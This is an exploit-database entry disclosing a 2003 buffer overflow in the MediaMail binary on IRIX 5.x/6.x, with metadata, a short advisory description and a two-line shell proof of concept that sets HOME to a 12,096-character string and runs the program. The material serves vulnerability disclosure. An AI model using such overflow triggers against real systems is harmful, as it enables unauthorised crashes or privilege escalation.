EXPLOITS

IRIX 5.x/6.x - MediaMail HOME Environment Variable Buffer Overflow

Author: bazarr@ziplip.com
type: dos
platform: irix
port: 
date_added: 2003-05-23  
date_updated: 2012-11-12  
verified: 1  
codes:   
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 22638.txt  

source: https://www.securityfocus.com/bid/7672/info

A buffer overflow vulnerability has been reported for the MediaMail binary that may result in a user obtaining elevated privileges.

Although unconfirmed, an attacker, using a custom crafted string, could overwrite stack memory, including the return address of a function, and potentially execute arbitrary code with group 'mail' privileges.

sh$ export $HOME=`perl -e 'print "A"x12096'
sh$ /usr/bin/X11/MediaMail